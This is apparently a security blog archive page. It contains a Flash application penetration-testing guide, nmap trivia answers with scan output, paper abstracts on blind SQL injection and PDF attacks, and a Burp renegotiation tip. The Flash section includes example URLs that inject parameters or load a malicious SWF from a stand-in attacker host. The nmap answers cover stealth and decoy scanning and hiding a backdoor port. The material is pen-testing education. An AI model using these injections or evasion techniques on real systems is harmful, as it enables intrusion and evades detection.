
Tuesday, July 27, 2010

A Lazy Pen Tester’s Guide to Testing Flash Applications

Yesterday, I received a post on the Pen-Test mailing list requesting tips and resources for penetration testing of Flash applications. While some tools and white papers are available, I could not find many authoritative resources that cover the entire spectrum of security testing for Flash RIAs. So here is an endeavor to detail the steps of such testing. I will keep this post to an outline of the essential steps and points. Please feel free to recommend additional tools and techniques. The idea is to come up with a comprehensive paper that pen-testers can use to test Flash-based Rich Internet Applications (RIAs).

A short unnecessary introduction on Flash RIA
Adobe Flash (formerly Macromedia Flash) is a multimedia platform originally acquired by Macromedia and currently developed and distributed by Adobe Systems. Since its introduction in 1996, Flash has become a popular method for adding animation and interactivity to web pages. Flash is commonly used to create animation, advertisements, and various web page Flash components, to integrate video into web pages, and more recently, to develop rich Internet applications. Source: en.wikipedia.org/wiki/Adobe_Flash

Conventionally, an RIA developed with Adobe Flash technology consists of a frontend application compiled as an SWF/AIR object, executed by the Flash plugin inside the user's browser or by the AIR runtime installed on the user's system. This interactive application provides a user interface to the end user and in turn communicates with a backend server for its business logic over protocols like HTTP/AMF, HTTP/SOAP, HTTP/REST, etc.

The security angle..
Like any widely used web application or piece of software, an RIA can fall victim to the most common and dangerous security issues. For example, since most Flash-based RIAs are backed by an application that provides the business logic and in turn uses a database, a Flash-based RIA might also be vulnerable to common application vulnerabilities like SQL injection if user input is not sanitized properly. Quite logical, huh? Attackers can also use Flash for mass exploitation, for example backdoors or malware written entirely in Flash/ActionScript, or buffer overflows against the player/plugin or the browser.

More generally, security flaws may also be present in the core environment (which includes the OS and web browsers) that can be exploited regardless of the applications (including Flash Player) running in that environment. A recent paper from Adobe suggests that Adobe's approach is to implement robust security within its own products while "doing no harm" to the rest of the environment (in other words, to introduce no exposures to the rest of the environment, nor allow any avenues for additional exploitation of existing platform security weaknesses). This provides a consistently high level of security for what Flash applications can do (as managed within Flash Player), regardless of the platform. Because Adobe products are also designed to be backwards-compatible when possible, some environments may be more vulnerable to weaknesses in the browser or operating system, or have weaker cryptography capabilities. Ultimately, users are responsible for their choice of platform and for maintaining an appropriate operational environment.

Vulnerabilities in Flash RIAs can be broadly classified into two categories: client-side vulnerabilities and server-side vulnerabilities. Let's review each of these quickly:

Client Side Vulnerabilities:
Amongst the various vulnerabilities that might affect a Flash Application on the client side, some of the most common ones are:

Flash Parameter Injection: It might be possible for an attacker to inject global Flash parameters when the movie is embedded in a parent HTML page. These injected parameters can grant the attacker full control over the page DOM, as well as control over other objects within the Flash movie. There is a nice, detailed paper by the IBM Rational guys on this vulnerability. You can download it here.
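
As a purely hypothetical illustration (the parameter names are invented), suppose the embedding page copies a request parameter into the FlashVars attribute without encoding it. An attacker may then be able to smuggle extra global variables into the movie with a crafted link:

http://victim.example.com/index.html?username=bob%26baseURL=http://evil.example.com/

The URL-encoded ampersand (%26) breaks out of the intended "username" value and defines an attacker-controlled "baseURL" variable inside the SWF.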

Cross Domain Privilege Escalation: Cross-domain inter-mixing of content and data is governed by the access policy defined in the crossdomain.xml of the domain serving the SWF object. If the access policy is too open, then under certain circumstances it might be possible for an attacker to supersede the original SWF object with his own malicious version or to access the DOM of the hosting domain.
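
A quick check of the policy only requires fetching it. A minimal sketch (the hostname is hypothetical) of retrieving the policy and the kind of overly permissive entry to look for:

$ curl http://www.example.com/crossdomain.xml
<?xml version="1.0"?>
<cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-policy>

A wildcard in allow-access-from means an SWF served from any domain can read data from this host with the victim's cookies attached.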

Cross Site Scripting: Depending on the access policy, a Flash SWF can access its host DOM for various functional use cases. A Flash SWF can in turn modify the DOM of its host, and if it does so based on unsanitized user input, it might be possible to perform a conventional XSS attack on the host DOM.

Cross Site Flashing: Cross-Site Flashing (XSF) occurs when one SWF object loads another SWF object. This attack can result in XSS or in modification of the GUI in order to fool a user into entering credentials on a fake Flash form. XSF can occur in the presence of Flash HTML injection or when external SWF files are loaded via loadMovie methods. OWASP has a testing guide for XSF; although not comprehensive, it is a very good starting point. Read it here.
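
A hypothetical example (parameter and file names invented): if player.swf loads whatever movie a FlashVar points to, a crafted link is enough to make it pull attacker-controlled content:

http://victim.example.com/player.swf?movieToLoad=http://evil.example.com/evil.swf

The loaded evil.swf can then overlay or manipulate the GUI of the legitimate movie and, if the loading SWF grants permissions via Security.allowDomain, access its data as well.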

Server Side Vulnerabilities
Flash applications frequently make remote calls to a backend server for various operations like looking up accounts, retrieving additional data and graphics, and performing complex business operations. However, the ability to call remote methods also increases the attack surface exposed by these applications. Flash applications built with the Adobe Flex SDK usually exchange AMF objects over HTTP as their method of communication. AMF remoting calls are essentially RPC-like calls where the Flash application invokes a given method defined on the server at a specific AMF endpoint. An attacker can intercept and tamper with the AMF data to compromise the server.
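
For orientation, an intercepted AMF remoting call is just an HTTP POST with a binary body; the endpoint path, service, and method below are purely illustrative:

POST /messagebroker/amf HTTP/1.1
Host: backend.example.com
Content-Type: application/x-amf
Content-Length: 142

(binary AMF body encoding a remoting call such as ProductService.getProductDetails("42"))

A proxy that understands AMF (Charles does natively) or a dedicated AMF client such as Pinta can decode the body so that the method name and parameters can be tampered with before forwarding.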

In most cases, the application server responsible for providing business logic to a Flash RIA frontend is a standard web application and can be affected by the very same vulnerabilities as any other web application, such as those described by the WASC Threat Classification project.

Testing Flash Applications: Objectives and Approach
A security testing exercise for a Flash-based RIA is conducted with the following objectives:

Identify the application entry points and test for possible vulnerabilities in the SWF Object itself.
Identify the remote server with which the application might communicate for its business logic requirements.
Identify the protocol with which the SWF object communicates with its back-end server. In most cases, the protocol will be either SOAP/REST or AMF.
Identify and enumerate all the functionalities exposed by the back-end application.
Penetration-test the individual functionalities exposed by the back-end application for standard application security vulnerabilities.
Client Side Testing
Client-side testing primarily relates to static analysis of the Flash application. The idea is to decompile the SWF file and take a white-box testing approach by looking into the source code of the SWF. The basic approach to testing client-side vulnerabilities is:

Decompile SWF files into source code (ActionScript) and statically analyze it to identify security issues such as hard-coded information disclosure.
Audit third-party applications without requiring access to the source code.
Common findings include hard-coded login credentials, internal IP disclosure, etc.
Apart from analyzing the SWF file, it is also important to analyze the code responsible for generating the HTML file that embeds the SWF object. Under certain circumstances it might be possible to manipulate the FlashVars variable through which SWF inputs can be influenced.
There are, however, automated tools like HP SWFScan available to do this job up to a certain degree; a manual sketch with swfdump and grep is shown below.
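
A minimal manual sketch of that job (the file name is hypothetical, assuming swftools' swfdump is installed; -D dumps everything, including disassembled ActionScript):

$ swfdump -D app.swf > app.txt
$ grep -inE "password|passwd|secret|login|key" app.txt        # hard-coded credentials
$ grep -oE "([0-9]{1,3}\.){3}[0-9]{1,3}" app.txt | sort -u     # internal IP addresses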

Server Side Testing
A straightforward way to do server-side testing of Flash-based RIA applications is as follows:

1. Extract Gateway

Load the Flash file (e.g. http://foo.com/bar.swf) in a browser with ServiceCapture, Burp proxy, or Charles proxy running.
Decompile the SWF using swfdump and grep for gateway patterns. Also get a list of all the URLs in the swfdump output (see the example below).
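
A rough sketch of that step (file names hypothetical, again assuming swftools' swfdump):

$ swfdump -D bar.swf > bar.txt
$ grep -oiE "https?://[^\"' ]+" bar.txt | sort -u                 # all embedded URLs
$ grep -inE "gateway|amf|messagebroker|flashservices" bar.txt     # likely AMF gateway references
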
2. Enumerate service/methods

Try amfphp.DiscoveryService on all gateways using Pinta.
Pinta can also make AMF calls when the services and methods are entered manually, which is helpful for testing remote methods.
If that fails, try extracting them from the swfdump output using the following regular expressions.
Services:

– "\"([a-zA-Z0-9_]*)\"" with filter as "service" (conventional)
– "destination id=\"([\w\d]*)\""

3. Make AMF calls

Use Pinta to call remote methods using different test parameters.
Try single quotes (SQL injection), neighboring parameter values (direct object reference), etc.
Once the exposed functionalities are enumerated, testing the backend application follows more or less the standard web application security testing methodology; the only difference is that another protocol (AMF-serialized calls in this case) is used to interact with the server and invoke the functionalities.

Checklist of Vulnerabilities to be tested
Cross Site Scripting
Malicious Data Injection
Insufficient Authorization Restrictions
Secure Transmission
SWF Information Leak
Minimum Stage Size for Anti-ClickJacking
SWF Control Permission
Untrusted SWF in Same Domain
Clickjacking
Privilege Separation
Cross Domain Policy Audit
Uninitialized Variable Scanning
Remote Method Enumeration
Business Logic Testing
This is a brief guide to testing Flash applications. Comments are welcome to make it better and more comprehensive. In the end, we intend to publish a freely available whitepaper for pen-testers on testing Flash-based RIAs. Additional sections included in the paper will carry due credit, as received in the comments section below.


http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt

http://www.owasp.org/images/d/d8/OWASP-WASCAppSec2007SanJose_FindingVulnsinFlashApps.ppt

Methods of Quick Exploitation of Blind SQL Injection

SQL Injection vulnerabilities are often detected by analyzing error messages received from the database, but sometimes we cannot exploit the discovered vulnerability using classic methods (e.g., union). Until recently, we had to use boring, slow techniques of symbol exhaustion in such cases. But is there any need to apply an ineffective approach, while we have the DBMS error message?! It can be adapted for line-by-line reading of data from a database or a file system, and this technique will be as easy as classic SQL Injection exploitation. It is foolish not to take advantage of such an opportunity! In this paper, we will consider the methods that allow one to use the database error messages as containers for useful data.

PDF Silent HTTP Form Repurposing Attacks

This paper sheds light on a modified approach to triggering web attacks through the JavaScript protocol handler in the context of the browser when a PDF is opened in it. It also looks at the kind of security mechanism implemented by Adobe to remove the insecurities that originate directly from a standalone PDF document and to circumvent cross-domain access. The attack targets web applications that allow PDF documents to be uploaded to the web server. Due to the security mechanism ingrained in the PDF reader, it is hard to launch certain attacks, but with this technique an attacker can steal generic information from a website by executing code directly in the context of the domain where the PDF is uploaded. The attack surface can be diversified by randomizing the attack vector. On further analysis it has been observed that it is possible to trigger phishing attacks too. Successful attacks have been conducted on a number of web applications, mainly to extract information based on DOM objects. The paper exposes a differential behavior of Acro JS and browser JavaScript.




NMAP Trivia ANSWERS: Mastering Network Mapping and Scanning

Three weeks ago I published the NMAP Trivia challenge. Thanks to all ISC readers that submitted their responses! A special mention goes to the winning entry from Jason DePriest, an extensive and elaborate submission, available here. Congratulations! The prize (a technical book) is on its way! ;)

Jon Kibler provided an in-progress idea for a new nmap feature: a scan proxy engine, equivalent to the FTP bounce scan, to scan through HTTP or SOCKS proxies.

Now... it is time for the answers:

1. What are the default target ports used by the current nmap version (4.76)? How can you change the target ports list? What (nmap) options can be used to speed up scans by reducing the number of target ports and still check (potentially) the most relevant ones? How can you force nmap to check all target ports?

Fyodor performed thorough port scan research last summer to identify the most common ports available on the Internet [1]. The current nmap version scans the 1000 most popular ports by default. The popularity of each port is coded inside the nmap-services configuration file (by default under /usr/local/share/nmap).

...
unknown 4/tcp 0.000477
rje 5/udp 0.000593 # Remote Job Entry
unknown 6/tcp 0.000502
echo 7/tcp 0.004855
echo 7/udp 0.024679
unknown 8/tcp 0.000013
...

Nmap provides an option for quick scans, "-F". It scans the 100 most popular ports, reducing the default load by one order of magnitude. Additionally, you can decide how many of the most popular ports you want to scan through the "--top-ports N" option, where "N" is the number of top ports.

# ./nmap -F scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 10:44 GMT
Interesting ports on scanme.nmap.org (64.13.134.52):
Not shown: 95 filtered ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp closed smtp
53/tcp open domain
80/tcp open http
113/tcp closed auth

Nmap done: 1 IP address (1 host up) scanned in 4.04 seconds

# ./nmap --top-ports 5 scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 10:44 GMT
Interesting ports on scanme.nmap.org (64.13.134.52):
PORT STATE SERVICE
21/tcp filtered ftp
22/tcp open ssh
23/tcp filtered telnet
80/tcp open http
443/tcp filtered https

Nmap done: 1 IP address (1 host up) scanned in 8.56 seconds

Finally, nmap allows you to define the specific set of ports to scan through the "-p" option, as in "-pT:22,80,443,U:53,69,514". All ports, including port 0, can be scanned by providing the "-p0-" option, meaning from 0 to the end of the range, that is, port 65535. You need to specify whether they are TCP or UDP ports, or both ("-sSU").

# nmap -p0- scanme.nmap.org

[1] http://insecure.org/presentations/BHDC08/


2. How can you force nmap to scan a specific list of 200 target ports, only relevant to you?

If you don't want to scan the most popular ports, you can tell nmap what particular list of ports to scan by specifying them with the "-p" option, one by one or in ranges, like in "-p 20-23,25,80,443". Because this can be too tedious for long lists of ports, the recommended way is to copy and edit the "nmap-services" file and create a custom version containing your list of interesting ports. The new custom file can be referenced using the "--servicedb" (for individual files) or "--datadir" (for the configuration files directory) options, as in:

# nmap --datadir ./myconfig scanme.nmap.org

If your custom file contains more than 200 target services, then you can use the "--top-ports 200" option again. The specific file and directory search order followed by nmap is detailed on page 370 of the nmap book: http://nmap.org/book/data-files-replacing-data-files.html.
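
A sketch of that workflow (the file name is arbitrary):

# cp /usr/local/share/nmap/nmap-services ./my-services
  (edit ./my-services so it only lists the ~200 services you care about)
# nmap --servicedb ./my-services scanme.nmap.org
# nmap --servicedb ./my-services --top-ports 200 scanme.nmap.org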


3. What is the default port used by nmap for UDP ping discovery (-PU)? Why? If you don't know it off the top of your head ;), how can you easily identify this port without using other tools (such as a sniffer) or inspecting nmap's source code?

By default, nmap sends an empty UDP packet to port UDP/31338 for the UDP ping discovery method ("-PU"). The reason is that there is a high chance this random high port is closed. This is the preferred state expected by nmap, trying to elicit an ICMP port unreachable packet in return and, as a result, identify the existence of a new host. The port number is defined in nmap.h, specifically in the DEFAULT_UDP_PROBE_PORT_SPEC constant. Did you notice it is the elite port (31337 in haxor speech) plus one?

Currently, nmap provides the "--packet-trace" option to gather detailed information about the network traffic and individual packets sent and received during its operations. Effectively, this option acts as a built-in sniffer, very useful for getting details about what nmap is doing behind the scenes.

# nmap -PU --packet-trace scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 10:58 GMT
SENT (0.6580s) UDP 192.168.166.166:59676 > 64.13.134.52:31338 ttl=58 id=45958 iplen=28
SENT (1.6560s) UDP 192.168.166.166:59677 > 64.13.134.52:31338 ttl=59 id=46599 iplen=28
Note: Host seems down. If it is really up, but blocking our ping probes, try -PN
Nmap done: 1 IP address (0 hosts up) scanned in 2.68 seconds


4. When nmap is run, sometimes it is difficult to know what is going on behind the scenes. What two (nmap) options allow you to gather detailed but not overwhelming information about nmap's port scanning operations? What other extra (nmap) options are available for ultra-detailed information?

The first of the options has been mentioned and used in the previous question, "--packet-trace". It provides tcpdump-like output of the packets sent and received. Additionally, nmap provides the "--reason" option to display the reason why a port has been classified in a specific state: open, closed, filtered, etc.

# nmap -F -sSU --reason scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 11:00 GMT
Interesting ports on scanme.nmap.org (64.13.134.52):
Not shown: 99 open|filtered ports, 96 filtered ports
Reason: 194 no-responses and 1 admin-prohibited
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
25/tcp closed smtp reset
53/tcp open domain syn-ack
80/tcp open http syn-ack
113/tcp closed auth reset

Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds

# nmap -F -sU --reason scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 11:02 GMT
Interesting ports on scanme.nmap.org (64.13.134.52):
Not shown: 99 open|filtered ports
Reason: 99 no-responses
PORT STATE SERVICE REASON
520/udp filtered route admin-prohibited from 192.168.15.1

Nmap done: 1 IP address (1 host up) scanned in 15.90 seconds

For those interested in gathering as much information as possible about nmap's operations, the "-v" verbosity option and the "-dN" debugging option are available. These options tell nmap to be verbose (multiple verbosity levels are allowed) or set the nmap debug level for troubleshooting purposes, where N can have a value between 1 and 9. Be careful when you use it! Try it and be ready for a Matrix-like output 8-)

# nmap -p80 -sS -v scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 11:07 GMT
Initiating Ping Scan at 11:07
Scanning 64.13.134.52 [2 ports]
Completed Ping Scan at 11:07, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:07
Completed Parallel DNS resolution of 1 host. at 11:07, 0.24s elapsed
Initiating SYN Stealth Scan at 11:07
Scanning scanme.nmap.org (64.13.134.52) [1 port]
Discovered open port 80/tcp on 64.13.134.52
Completed SYN Stealth Scan at 11:07, 0.26s elapsed (1 total ports)
Host scanme.nmap.org (64.13.134.52) appears to be up ... good.
Interesting ports on scanme.nmap.org (64.13.134.52):
PORT STATE SERVICE
80/tcp open http

Read data files from: .
Nmap done: 1 IP address (1 host up) scanned in 6.13 seconds
Raw packets sent: 3 (112B) | Rcvd: 2 (72B)


# nmap -p80 -sS -d1 scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 11:08 GMT
--------------- Timing report ---------------
...
---------------------------------------------
Initiating Ping Scan at 11:08
Scanning 64.13.134.52 [2 ports]
...
Nmap done: 1 IP address (1 host up) scanned in 0.74 seconds
Raw packets sent: 3 (112B) | Rcvd: 2 (72B)

Try it on your own! ;)


5. What are the preferred (nmap) options to run a stealthy TCP port scan? In particular, try to avoid detection by someone running a sniffer near the person running nmap, and focus on the extra actions performed by the tool (assuming the packets required to complete the port scan are not detected).

Most current network IDS can detect the default packets generated by nmap when port scanning a target. We are assuming here these cannot be detected, so a stealthier scan can be launched by using the "-n" option (not used in any of the Nmap Trivia examples), that is, disabling all reverse DNS resolution at the nmap level. Most Unix-based security tools provide this same option for the same purpose.

# nmap -F -n scanme.nmap.org

However, this way you lose the sometimes valuable DNS information. You can use the "--dns-servers" option to indicate the DNS recursive servers to use as DNS proxies when analyzing the target IP address.
More stealth-related details in answer number 12.

6. Why is port number 49152 relevant to nmap?

Port 49152 is the first of the ephemeral ports for dynamic usage according to IANA. However, the actual port assignment depends on the implementation of your tools or operating system. See http://www.iana.org/assignments/port-numbers:
- The Well Known Ports are those from 0 through 1023
- The Registered Ports are those from 1024 through 49151
- The Dynamic and/or Private Ports are those from 49152 through 65535

7. What is the only nmap TCP scan type that classifies the target ports as "unfiltered"? Why? What additional nmap scan type can be used to discern if those ports (previously identified as "unfiltered") are in an open or closed state?

The only nmap scan type that can show a port in the "unfiltered" state is the TCP ACK scan, the "-sA" option. The reason is that this scan cannot differentiate between an open and a closed port, as a target host (if unfiltered) will always reply with a RST packet. This is the standard behavior for a closed port, and it is also standard for an open port for which there is no previously established connection to map the ACK packet to. Therefore, nmap's ACK scan cannot be considered a port scan, as it cannot differentiate between port states, but rather a host discovery scan.

The TCP Window scan, the "-sW" option, is similar to the TCP ACK scan, but it can differentiate between open and closed ports in some scenarios.
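
For example, running both scans against the same ports makes the difference visible (the exact output will depend on the target's filtering):

# nmap -sA -p22,25,80 scanme.nmap.org     (reachable ports are reported as "unfiltered")
# nmap -sW -p22,25,80 scanme.nmap.org     (the Window scan may split them into open/closed)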

8. When (and in what nmap version) was the default state for a non-responsive UDP port changed (from "open" to "open|filtered")? Why?

The default state for a non-responsive UDP port was changed (from "open" to "open|filtered") in nmap version 3.70 in 2004. The reason was accuracy, as the extensive use of filtering devices by that time made filtered UDP ports always appear as open in previous nmap versions.

9. What is the default scan type used by nmap when none is specified, as in "nmap -T4 scanme.nmap.org"? Is this always the default scan method? If not, what other scan method does nmap default to, under what conditions, and why?

The current nmap version performs a TCP SYN scan ("-sS" option) by default when no scan type is specified. However, this is only the default behavior when nmap is launched as a privileged user (e.g. root on Linux). The TCP connect scan, the "-sT" option (connect() syscall), is used by default for non-privileged users, as these cannot send raw packets (used by the SYN scan), and when there are IPv6 targets.

# ./nmap -PN -p80,81 --packet-trace scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 11:22 GMT
...
SENT (0.3730s) TCP 192.168.166.166:56464 > 64.13.134.52:80 S ttl=50 \
id=8102 iplen=44 seq=1698869517 win=3072
SENT (0.3740s) TCP 192.168.166.166:56464 > 64.13.134.52:81 S ttl=43 \
id=48226 iplen=44 seq=1698869517 win=4096
RCVD (0.6120s) TCP 64.13.134.52:80 > 192.168.166.166:56464 SA ttl=48 \
id=0 iplen=44 seq=2849983456 win=5840 ack=1698869518
RCVD (1.9570s) TCP 64.13.134.52:80 > 192.168.166.166:40972 SA ttl=48 \
id=0 iplen=44 seq=2805666242 win=5840 ack=2103880733
SENT (2.5730s) TCP 192.168.166.166:56465 > 64.13.134.52:81 S ttl=55 \
id=14744 iplen=44 seq=1698935052 win=4096
Interesting ports on scanme.nmap.org (64.13.134.52):
PORT STATE SERVICE
80/tcp open http
81/tcp filtered hosts2-ns

Nmap done: 1 IP address (1 host up) scanned in 3.79 seconds

$ ./nmap -PN -p80,81 --packet-trace scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 11:25 GMT
...
CONN (0.1290s) TCP localhost > 64.13.134.52:80 => Operation now in progress
CONN (0.1290s) TCP localhost > 64.13.134.52:81 => Operation now in progress
CONN (2.3510s) TCP localhost > 64.13.134.52:81 => Operation now in progress
Interesting ports on scanme.nmap.org (64.13.134.52):
PORT STATE SERVICE
80/tcp open http
81/tcp filtered hosts2-ns

Nmap done: 1 IP address (1 host up) scanned in 3.57 seconds


10. What nmap features (can make or) make use of nmap's raw packet capabilities? What nmap features rely on the OS TCP/IP stack instead?

Nmap makes use of raw packet capabilities by default (the "--send-eth" option), as demonstrated in the previous question, for features such as TCP and UDP port scans launched by privileged users (except for the connect scan and the FTP bounce scan) and fragmentation probes. Other features, like the Nmap Scripting Engine and version detection, rely on the OS TCP/IP stack.

11. Nmap's performance has been sometimes criticized versus other network scanners. What (nmap) options can you use to convert nmap into a faster, stateless scanner for high performance but less accurate results?

If the congestion control and packet loss detection algorithms are omitted, a scanner will run faster. Nmap can achieve behavior similar to stateless scanners (no code to track and retransmit probes) using the following options:

# ./nmap --min-rate 1000 --max-retries 0 ...

These tell nmap to send at least 1000 packets per second (if your system or wire can keep up) and disable retransmission of timed-out probes. However, take into account the impact this might have on the accuracy of the results.

# ./nmap -PN -n --min-rate 1000 --max-retries 0 -F scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 12:08 GMT
Warning: Giving up on port early because retransmission cap hit.
Interesting ports on 64.13.134.52:
Not shown: 95 filtered ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp closed smtp
53/tcp open domain
80/tcp open http
113/tcp closed auth

Nmap done: 1 IP address (1 host up) scanned in 1.06 seconds

12. What relevant nmap feature does not allow an attacker to use the decoy functionality (-D) and might reveal his real IP address?

Apart from the previously mentioned "-n" option to run stealthier scans and avoid IDS detection, there are other related options, such as "--data-length" to change the default empty packet used for some probes, "--ttl" to modify the TTL of the sent packets, timing options ("-T"), "--randomize-hosts" to change the order in which the target hosts are scanned, or "-D" to launch a decoy scan (simulating that the scan comes from multiple hosts).

Decoys are used in the ping discovery, port scanning, and remote OS detection phases. However, this feature does not apply when DNS queries or service version detection ("-sV" or "-A") are used, so the real source IP address is disclosed.
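
A decoy scan example (the decoy addresses are placeholders from the documentation range; "ME" marks the position of your real address in the decoy list):

# nmap -sS -PN -n -D 192.0.2.10,192.0.2.20,ME -p80 scanme.nmap.org

Adding "-sV" or "-A" to this command would make the real source address show up in the version detection traffic.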

13. What are the (nmap) options you can use to identify all the steps followed by nmap to fingerprint and identify the Web server version running on scanme.nmap.org?

# ./nmap -sSV -p80 --version-trace scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 12:17 GMT
...
SCRIPT ENGINE: Initiating script scanning.
SCRIPT ENGINE: Script scanning scanme.nmap.org (64.13.134.52).
SCRIPT ENGINE: Initialized 4 rules
SCRIPT ENGINE: Matching rules.
SCRIPT ENGINE: Running scripts.
SCRIPT ENGINE: Script scanning completed.
Scanned at 2009-01-21 12:17:57 GMT for 8s
Interesting ports on scanme.nmap.org (64.13.134.52):
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.2 ((Fedora))
Final times for host: srtt: 238764 rttvar: 179294 to: 955940

Read from .: nmap-rpc nmap-service-probes nmap-services.
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.17 seconds

The "-sSV" option allows you to focus on a TCP scan type (SYN scan in this case, "-sS"), and fingerprint the service ("-sV"). In order to just target the web server (supposing HTTP (TCP/80) is the target port, and not HTTPS (TCP/443)), the "-p80" option must be used.

The "--version-trace" option is similar to the "--packet-trace" option, but instead of dumping the network traffic, it dumps all the actions or steps performed by nmap during the execution of the service fingerprinting modules. Additionally, other debug options ("-dN") can be added to gather further details.

14. As an attacker, what port number would you select to hide a listening service backdoor trying to avoid an accurate detection by nmap's default aggressive fingerprinting tests? Would it be TCP or UDP? Why? What additional (nmap) options do you need to specify as a defender to fingerprint the hidden service backdoor?

If a port in the range TCP/9100-9107 is selected for a backdoor, nmap won't fingerprint the service, because these are common ports for printer services. These ports are excluded by default from the service fingerprinting tests ("-sV") and aggressive scan options ("-A"), trying to save the planet (trees and forests specifically) by not making printers dump dozens of pages full of nmap probes and garbage as a result of the stimulus received from the scan.

If you want to enable service fingerprinting on all ports, there are two options. The "--allports" option can be specified, as in "nmap -A --allports", or the nmap-service-probes file can be modified to enable these ports by removing the "Exclude" directive.
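
For example, to fingerprint a suspicious service hiding on the printer ports (the target name is a placeholder):

# nmap -sV --allports -p9100-9107 target.example.com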


15. What is the language used to write NSE scripts, and what two other famous open-source security tools/projects currently use the same language?

Nmap uses the Lua (www.lua.org) programming language. Lua (pronounced LOO-ah) means "Moon" in Portuguese, or "Luna" in Spanish ;) Other famous open-source security tools, like Wireshark and Snort, use Lua to extend their capabilities.


16. What Linux/Windows command can you use to identify the list of NSE scripts that belong to the "discovery" category and will execute when this set of scripts is selected with the "--script discovery" nmap option?

By default, NSE scripts are available under the "scripts" directory (however, nmap searches other locations too: --datadir, $NMAPDIR, etc.), with the ".nse" file extension. All NSE scripts belong to one or more categories, defined inside the script, and are indexed by the scripts/script.db database (updated through the "--script-updatedb" option).

Therefore a couple of options to search for discovery scripts in Linux are:

# grep discovery scripts/*.nse
scripts/ASN.nse:categories = {"discovery", "external"}
scripts/HTTP_open_proxy.nse:categories = {"default", "discovery", "external", "intrusive"}
scripts/HTTPtrace.nse:categories = {"discovery"}
...

# grep discovery scripts/script.db
Entry{ category = "discovery", filename = "HTTPtrace.nse" }
Entry{ category = "discovery", filename = "rpcinfo.nse" }
Entry{ category = "discovery", filename = "SMTPcommands.nse" }
...

You can perform a similar search in Windows using the built-in search capabilities (searching by "A word or phrase in the file" to look inside the directory) or the find or findstr commands (to search within a file or set of files).

17. How can you know the specific arguments accepted by a specific NSE script, such as those accepted by the whois.nse script?

In order to identify the arguments that can be passed through the "--script-args" option to an NSE script, e.g. whois.nse, check the documentation or code within the script file. If it is properly documented, search for "-- @args" to go to the arguments documentation section.
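
For example, on a Unix-like system:

# grep -n -- "-- @args" scripts/whois.nse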

Finally, a couple of extra questions for the real nmap-lovers:

How can you get, in real time, the open ports discovered by nmap before the final report is displayed?
What happens when you run nmap in verbose mode on September 1?
That's all folks! Happy nmap discovery and scanning!

Certificate-based Client Authentication in WebApp PenTests

http://www.radajo.com/2009/10/sqlninja-metasploit-demo.html
One of the key attack tools for performing effective Web Application Penetration Tests (WebApp PenTests) is the interception proxy, which allows the analyst to inspect and modify all the requests and responses exchanged between the web browser and the target web application. Some of the most popular ones, such as Paros, WebScarab, or Burp, are developed in Java, with the Java platform being a prerequisite to run them.

Sun/Oracle has recently released new updates for Java: Java 6 Update 19 in March 2010, fixing 27 security issues, and Java 6 Update 20 in April 2010, including a couple of fixes. If you have updated the Java version of your pentesting system (you did, didn't you?), you must be aware that your interception proxies won't be able to audit web applications that make use of client X.509 certificates for authentication. This specifically affects pentests on e-government and e-banking web applications making use of client certificates, such as those stored on smart cards (like some European national identity cards); in particular for Spain, dozens of websites integrate authentication through the electronic national ID card, "DNI electronico" (DNIe).

The reason is that Java 6 Update 19 includes a fix for the famous SSL/TLS renegotiation vulnerability from November 2009 (CVE-2009-3555). The SSL/TLS renegotiation feature is specifically used by certificate-based client authentication, and the fix disables SSL/TLS renegotiation in the Java Secure Sockets Extension (JSSE) by default. As a result, when you try to access a web resource that requires certificate-based client authentication through the interception proxy, it generates the following Java SSL/TLS error message (javax.net.ssl.SSLException): "HelloRequest followed by an unexpected handshake message".

WebScarab error message:

Burp error message:

However, it is still possible to re-enable the SSL/TLS renegotiation in Java by setting the new system property sun.security.ssl.allowUnsafeRenegotiation to true before the JSSE library is initialized. The following Windows command line launches Burp with SSL/TLS renegotiation enabled:

C:\>java -jar -Xmx512m -Dsun.security.ssl.allowUnsafeRenegotiation=true "C:\Program Files\burpsuite_pro_v1.3\burpsuite_pro_v1.3.jar"

Keep your WebApp PenTests rolling!

Shameless plug: Interested in learning the art of WebApp PenTesting? I will be teaching SANS SEC542, "Web Application Penetration Testing and Ethical Hacking", in London (May 10-15, 2010) in English and in Madrid (September 20-25, 2010) in Spanish.

Monday, July 26, 2010

Additional notes in PHP source code auditing

http://www.abysssec.com/blog/category/fuzzing/


20 ways to php Source code fuzzing (Auditing)

Monday, July 12, 2010

HTTP Status Codes

Informational 1xx

100 Continue
The client SHOULD continue with its request. This interim response is used to inform the client that the initial part of the request has been received and has not yet been rejected by the server. The client SHOULD continue by sending the remainder of the request or, if the request has already been completed, ignore this response. The server MUST send a final response after the request has been completed. See section 8.2.3 for detailed discussion of the use and handling of this status code.
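
For illustration (host and sizes are made up), a typical exchange looks like this:

POST /upload HTTP/1.1
Host: www.example.com
Content-Length: 1048576
Expect: 100-continue

HTTP/1.1 100 Continue

(the client now sends the 1048576-byte body, and the server answers with its final status, e.g. 200 OK or 201 Created)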


101 Switching Protocols
The server understands and is willing to comply with the client's request, via the Upgrade message header field (section 14.42), for a change in the application protocol being used on this connection. The server will switch protocols to those defined by the response's Upgrade header field immediately after the empty line which terminates the 101 response.

